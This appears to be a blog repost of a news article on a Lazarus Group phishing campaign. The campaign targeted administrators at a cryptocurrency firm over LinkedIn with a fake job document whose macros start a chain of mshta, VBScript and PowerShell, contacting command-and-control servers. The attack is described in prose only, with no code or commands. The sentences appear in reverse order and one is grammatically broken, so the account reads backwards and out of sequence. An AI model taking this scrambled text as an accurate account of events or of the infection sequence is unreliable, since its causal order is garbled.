This eventually leads to the download and execution of a PowerShell script that retrieves a further payload from a third C2, researchers said. The “bit.ly” link then redirects to a domain that executes a VBScript to perform checks on the host and collect further information, which is then sent to a second Command and Control (C2) domain. Upon further inspection of the link used in the phishing attack, researchers found that it was accessed 73 times from at least 19 countries – including the U.S., China and the UK – leading researchers to conclude that this is a “widely-targeted lure document.” This then calls out to a “bit.ly” link created in early May 2019, researchers said. The macro in the document creates an LNK file that results in the execution of mshta.exe. Once the target enabled the macros, malicious embedded macro code would then execute. Once the target clicked on the malicious document, the document claimed to be protected by General Data Protection Regulation (GDPR) restrictions, and that the user needed to enable macros in Microsoft Word for further access. The document masqueraded as a legitimate job advertisement for a role in a blockchain technology company, which matched the employee’s skills, researchers said. The attackers targeted system administrators in an unnamed cryptocurrency company with a phishing document, which was attached to a message sent to their personal LinkedIn accounts. “Lazarus Group’s activities are a continued threat: the phishing campaign associated with this attack has been observed continuing into 2020, raising the need for awareness and ongoing vigilance amongst organizations operating in the targeted verticals,” said researchers with F-Secure in a Tuesday post. The goal of the campaign appears to be financially motivated, with the attackers harvesting credentials necessary for accessing cryptocurrency wallets or online bank accounts. Researchers say that the recently identified a series of incident that were part of a broader campaign targeting businesses worldwide through LinkedIn messages sent to targets’ personal LinkedIn accounts. The nation-state threat operator Lazarus Group is being tied to a recent phishing campaign that targeted admins at a cryptocurrency firm via LinkedIn messages.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |